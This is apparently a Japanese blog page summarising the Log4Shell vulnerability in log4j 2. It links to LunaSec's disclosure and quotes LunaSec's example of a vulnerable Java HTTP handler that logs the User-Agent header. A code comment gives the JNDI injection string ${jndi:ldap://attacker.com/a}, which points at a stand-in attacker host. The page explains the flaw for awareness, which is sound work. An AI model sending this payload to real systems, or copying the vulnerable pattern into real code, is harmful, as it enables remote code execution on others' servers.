【ブログ】

◆Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package (LunaSec, 2021/12/09)
https://www.lunasec.io/docs/blog/log4j-zero-day/

【関連まとめ記事】

◆全体まとめ

◆Log4j (まとめ)
https://vul.hatenadiary.com/entry/Log4j

【Exploit Code】

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

import java.io.*;
import java.sql.SQLException;
import java.util.*;

public class VulnerableLog4jExampleHandler implements HttpHandler {

  static Logger log = LogManager.getLogger(VulnerableLog4jExampleHandler.class.getName());

  /**
   * A simple HTTP endpoint that reads the request's User Agent and logs it back.
   * This is basically pseudo-code to explain the vulnerability, and not a full example.
   * @param he HTTP Request Object
   */
  public void handle(HttpExchange he) throws IOException {
    String userAgent = he.getRequestHeader("user-agent");

    // This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.
    // The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}
    log.info("Request User Agent:{}", userAgent);

    String response = "<h1>Hello There, " + userAgent + "!</h1>";
    he.sendResponseHeaders(200, response.length());
    OutputStream os = he.getResponseBody();
    os.write(response.getBytes());
    os.close();
  }
}

出典: https://www.lunasec.io/docs/blog/log4j-zero-day/#example-vulnerable-code